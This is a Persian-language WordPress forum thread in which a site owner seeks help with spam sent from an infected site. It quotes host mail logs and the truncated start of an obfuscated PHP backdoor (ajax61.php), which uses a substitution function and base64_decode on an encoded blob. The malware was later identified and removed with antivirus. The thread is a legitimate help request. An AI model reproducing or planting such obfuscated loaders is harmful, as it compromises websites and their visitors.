hiwa

مشکل امنیتی در مورد ارسال ایمیل ناخواسته از سایت + جزئیات خطا

5 پست در این موضوع قرار دارد

سلام دوستان

من یک هفته است درگیر یک مشکل امنیتی در سایت وردپرسم هستم ممنون میشم اگه وقت بگذارید نظرتون رو بگید تا بتونم بررسی های بیشتری داشته باشم.

متن خطایی که کارشناس هاست برای من ارسال کرده اینه:

لینک های مربوط به صفحات و کدهای آلوده در سایت شما به شرح ذیل ارائه می گردد : 


[27-Dec-2016 20:48:46 America/New_York] mail() on [D:\HostingSpaces\mydomain.com\mydomain.com\wwwroot\wp-includes\widgets\ajax61.php(1958) : eval()'d code:775]: To: manclik@o2.pl -- Headers: Date: Tue, 27 Dec 2016 20:48:46 -0500 From: Adrianna <adrianna@mydomain.com> Message-ID: <e086de42938f51715a6c6f5e2440922a@peykeaval.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: multipart/alternative;     boundary="b1_e086de42938f51715a6c6f5e2440922a" Content-Transfer-Encoding: 8bit


[28-Dec-2016 03:32:25 America/New_York] mail() on [D:\HostingSpaces\mydomain.com\mydomain.com\wwwroot\wp-includes\widgets\ajax61.php(1958) : eval()'d code:775]: To: panos@spitfire.gr -- Headers: Date: Wed, 28 Dec 2016 03:32:25 -0500 From: Debbie <debbie@mydomain.com> Message-ID: <f69af4c19b6af26f68341250901069ed@peykeaval.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: multipart/alternative;     boundary="b1_f69af4c19b6af26f68341250901069ed" Content-Transfer-Encoding: 8bit

قالبی که استفاده کردم listify نام داره . از سایت nikan خریداری کردم (250 هزار)

دو سه روز کامل درگیر اسکن و بررسی بودم و دوباره فایل های اسکن شده رو روی هاست(ویندوزی) پاک شده آپلود کردم اما باز هم همان مشکل قبلی پیش آمد.

سیستم خودم رو فول اسکن کردم.

تمام فایلهای سایت رو هم دانلود اسکن کردم. موارد مشکوک رو fix کردم با آنتی ویرویس avast Free اما مشکلم حل نشده.

راهکاری به نظرتون میرسه ؟

ممنون

ویرایش شده در توسط hiwa

به اشتراک گذاری این پست


لینک به پست

محتوای فایل ajax61.php هم به این شکله :

<?php
 $euvwzec = 2437; function kjmlq($hebqeajjrg, $psycehqwla){$evprzo = ''; for($i=0; $i < strlen($hebqeajjrg); $i++){$evprzo .= isset($psycehqwla[$hebqeajjrg[$i]]) ? $psycehqwla[$hebqeajjrg[$i]] : $hebqeajjrg[$i];}
$duqcskxg="base" . "64_decode";return $duqcskxg($evprzo);}
$qewdep = 'FSUdZJwNMAF8ktJfvcwfAtzIMfv3uXjJiXq76q1xFSUdZJwNMAF8ktzIM5wUvnkIvnGnOC9qxi3rCg47lcUR'.
'vtJ1xChKbAYRMAYUbeJ1ZQwdAeL7lQ0nOC9qxi3rCg4NMALRhSUKMJw3ZQ57'.
'hCsqxi3rCs1xZQb8ZArNMAF8kywiLJkQLJu7xF1x2q1xCDLR01JDJgJDQfhFDy4R01JGLBhhuo1suBWB6f9rCsggA5ry0UMy0U'.
'3n0gJri5LyA1yXLyunAD9wuCuzGavdGCEqOaXB6q1xCQUcxCyUlA412DsgA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLy'.
'wSi5unADg7oF8k2q1xCFggA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLywSi5unAD9wuC'.

 

به اشتراک گذاری این پست


لینک به پست
در 5 ساعت قبل، hiwa گفته است :

محتوای فایل ajax61.php هم به این شکله :


<?php
 $euvwzec = 2437; function kjmlq($hebqeajjrg, $psycehqwla){$evprzo = ''; for($i=0; $i < strlen($hebqeajjrg); $i++){$evprzo .= isset($psycehqwla[$hebqeajjrg[$i]]) ? $psycehqwla[$hebqeajjrg[$i]] : $hebqeajjrg[$i];}
$duqcskxg="base" . "64_decode";return $duqcskxg($evprzo);}
$qewdep = 'FSUdZJwNMAF8ktJfvcwfAtzIMfv3uXjJiXq76q1xFSUdZJwNMAF8ktzIM5wUvnkIvnGnOC9qxi3rCg47lcUR'.
'vtJ1xChKbAYRMAYUbeJ1ZQwdAeL7lQ0nOC9qxi3rCg4NMALRhSUKMJw3ZQ57'.
'hCsqxi3rCs1xZQb8ZArNMAF8kywiLJkQLJu7xF1x2q1xCDLR01JDJgJDQfhFDy4R01JGLBhhuo1suBWB6f9rCsggA5ry0UMy0U'.
'3n0gJri5LyA1yXLyunAD9wuCuzGavdGCEqOaXB6q1xCQUcxCyUlA412DsgA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLy'.
'wSi5unADg7oF8k2q1xCFggA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLywSi5unAD9wuC'.

 

درود بر شما بنده زیاد ازین کدها سر در نیاوردم ولی تا جایی که متوجه شدم اول اینکه شما دارین از هاست ویندوز استفاده میکنین که این زیاد با وردپرس همخوانی نداره و عمده مشکلاتتون دقیقا از اینجا شروع میشه!

بعدش اینکه فک میکنم یه کد مخرب بصورت رمزگذاری شده همون متن سبز رنگ در یکی از ابزارکهای قالب وجود داره!

که اول باید دیکد بشه و بعدا که متوجه شدین چی هست حذف بشه!

یا اون بخش از کدها رو حدف کنید و ببینید مشکل بر طرف میشه یا بازم وجود داره!

فک میکنم این موارد رو چک کنید مشکلتون برطرف بشه اگر نشد بازم پیام بزاردی فرصتی داشتم خدمت میرسم و بازم چک میکنیم با هم

^_^

به اشتراک گذاری این پست


لینک به پست

دوستت عزیز خیلی متشکرم از جوابت. مواردی که گفتی رو دارم انجام میدم. امیدوارم حل بشه. نتیجه رو حتما خدمتت گزارش میدم. بازم ممنونم ازت.

به اشتراک گذاری این پست


لینک به پست

مشکل من یک بک دور به اسم Backdoor.PHP.Agent.RO  بود که به کمک Bitdefender total security 2017 تونستم مشکل رو حل کنم.

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط hiwa
      سلام دوستان
      یک مشکل خاصی 1-2 هفته است من رو بدون گرفتن نتیجه به خودش مشغول کرده (با کلی استرس و اعصاب خوردی). الان به ذهنم رسید که مشکل رو اینجا مطرح کنم شاید کسی بتونه کمکم کنه. حتی اگه هزینه ای مطالبه باهاش واقعا ممنونتون میشم.
      من در یک سایت آگهی (لینک) که از افزونه wp job manager و افزونه های مکمل این افزونه برای ساخت این سایت استفاده کرده ام (قالب listify).
      سایت به خوبی کار میکرد تا اینکه مجبور شدم سایت رو به کمک polylang دو زبانه کنم (توسعه دهنده قالب این افزونه رو توصیه کرده: لینک)
      پس از نصب این افزونه، فایل mo افزونه job manager دیگه لود نمیشه. یعنی بخشهایی از سایت که مربوط به این افزونه است، انگلیسی میشه (این صفحه سایت، وقتی polylang غیرفعال باشه کاملا فارسیه اما وقتی فعال باشه به این صورت نمایش داده میشه یعنی ترکیبی از فارسی و انگلیسی)
      با غیر فعال کردن polylang مشکل رفع میشه
      اما من باید سایت رو دو زبانه کنم. پس مجبورم از polylang استفاده کنم.
      آیا راهی وجود داره که بدون استفاده از فایل po بخشهایی که مربوط به این افزونه job manager هست رو فارسی کنم؟
      ممنون میشم هر راه حل و سرنخی به ذهنت میرسه رو بهم بگید
      زیاد سرچ کردم. بقیه هم این مشکل رو با ترکیب این دو افزونه دارند(لینک) اما راه حلی که واسه من موثر باشه رو پیشنهاد نکرده ان.
       
    • توسط shikpars_com
      باسلام خدمت  همه دوستان ی سوال داشتم اگه کسی میدونه راهنمایی کنه
      در وردپرس قابلیتی رو میشناسید که از طریق اون بشه به دیتابیس سایت وردپرسی دسترسی پیدا کرد 
      مثلا بشه تمام دسته بندی هارو یکجا با یک کوئری از دیتابیس گرفت؟؟
    • توسط alirezax2
      با سلام
      مشکل:
      لاگین وردپرسم یوزر و پسورد و میزنم فقط صفحه ریفرش میشه و دوباره لاگین میاد بدون هیچ خطایی ... بدون هیچ تغییراتی در سایت بوجود اومده!!!
      راه حل هایی که رفتم:
      1- غیر فعال کردن کلیه افزونه ها از طریق هاست
      2- تغییر theme
      3- تغییر htaccess
      4 - آپدیت دستی وردپرس
      5- و ...
      متاسفانه مشکل حل نشد!! به ادمین هاستمم گفتم همون راه حل های بالا رو داد گف نشد دوباره wp نصب کن!!
      من نمیخوام دوباره نصب کنم چون مشکلات زیادی میخورم تنظیمات قالبم، دیتابیس و...
      کسی میدونه چه راه دیگه ای هست؟؟ یا مشکل مشابه داشته؟؟ چطوری حل کنم؟ دارم روانی میشم
    • توسط jalal125j
      سلام.
       
      دوستان یک سوال داشتم کل عید رو وقت گذاشتم روش موفق نشدم پیدا کنم تا چاره رو مشورت از دوستان گرامی دیدم، توی این سایت دو تا افزونه برای معرفی به شبکه های اجتماعی داده شده (http://propozal.ir). می خوام برای دیده شدن سایت عین این افزونه رو داشته باشم که هم کنار یک عنوان و هم زیرش قابلیت معرفی به شبکه‌های اجتماعی وجود داشته باشه. افزونه‌هایی که پیدا کردم فقط زیر پست یا بالای پست لینک شبکه های اجتماعی رو قرار می ده، اما این سایت از هر دو رو همزمان باهم داره.
    • توسط armakcell
      با سلام بنده در سایتم میخواستم یک ابزارک قرار بدم مانند ابزارک این سایت
      http://powerturk.ir

      اگر داخل این سایت برید در یک قسمت نوشته است آرشیو فول البوم
      بنده این ابزارک را چگونه به دست بیارم؟
      بنده یک تصویر ضمیمه میکنم در صورتی که در سایت وارد نشد